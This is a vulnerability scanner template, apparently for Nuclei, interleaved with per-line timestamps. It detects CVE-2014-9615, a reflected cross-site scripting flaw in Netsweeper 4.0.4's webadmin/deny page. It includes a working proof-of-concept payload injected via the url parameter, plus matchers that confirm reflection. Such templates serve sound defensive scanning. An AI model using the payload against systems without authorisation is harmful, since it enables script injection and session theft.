2021-12-06 16:38:54 +00:00
id : CVE-2014-9615
info :
2022-02-25 22:07:55 +00:00
name : Netsweeper 4.0.4 - Cross-Site Scripting
2021-12-06 16:38:54 +00:00
author : daffainfo
severity : medium
2022-02-25 22:07:55 +00:00
description : A cross-site scripting vulnerability in Netsweeper 4.0.4 allows remote attackers to inject arbitrary web script or HTML via the url parameter to webadmin/deny/index.php.
2023-09-27 15:51:13 +00:00
impact : |
Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
2023-09-06 13:22:34 +00:00
remediation : |
Apply the latest security patches or updates provided by the vendor to mitigate this vulnerability.
2021-12-07 07:55:57 +00:00
reference :
- https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz
- https://nvd.nist.gov/vuln/detail/CVE-2014-9615
2022-05-17 09:18:12 +00:00
- http://packetstormsecurity.com/files/133034/Netsweeper-Bypass-XSS-Redirection-SQL-Injection-Execution.html
2024-01-29 17:11:14 +00:00
- https://github.com/ARPSyndicate/kenzer-templates
2021-12-06 16:40:52 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 6.1
2021-12-06 16:40:52 +00:00
cve-id : CVE-2014-9615
cwe-id : CWE-79
2023-04-12 10:55:48 +00:00
epss-score : 0.00102
2024-03-23 09:28:19 +00:00
epss-percentile : 0.40591
2023-09-06 13:22:34 +00:00
cpe : cpe:2.3:a:netsweeper:netsweeper:4.0.4:*:*:*:*:*:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : netsweeper
product : netsweeper
2024-01-14 09:21:50 +00:00
tags : cve2014,cve,netsweeper,xss,packetstorm
2021-12-06 16:38:54 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-12-06 16:38:54 +00:00
- method : GET
path :
2021-12-07 07:55:57 +00:00
- '{{BaseURL}}/webadmin/deny/index.php?dpid=1&dpruleid=1&cat=1&ttl=5018400&groupname=<group_name_eg_netsweeper_student_allow_internet_access&policyname=auto_created&username=root&userip=127.0.0.1&connectionip=127.0.0.1&nsphostname=netsweeper&url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
2021-12-06 16:38:54 +00:00
matchers-condition : and
matchers :
- type : word
part : body
2021-12-07 07:55:57 +00:00
words :
- '</script><script>alert(document.domain)</script>'
2021-12-06 16:38:54 +00:00
- type : word
part : header
words :
- text/html
- type : status
status :
2021-12-07 07:55:57 +00:00
- 200
2024-03-25 11:57:16 +00:00
# digest: 4a0a00473045022100afdf2fdb6e0145b27c1806b74b05004660dd804acc398f60bd9721b973b0a87002205e93a7b347f6ed674908692a1a6427dd067c9e72cd4c40ed43ea901641042ad7:922c64590222798bb761d5b6d8e72950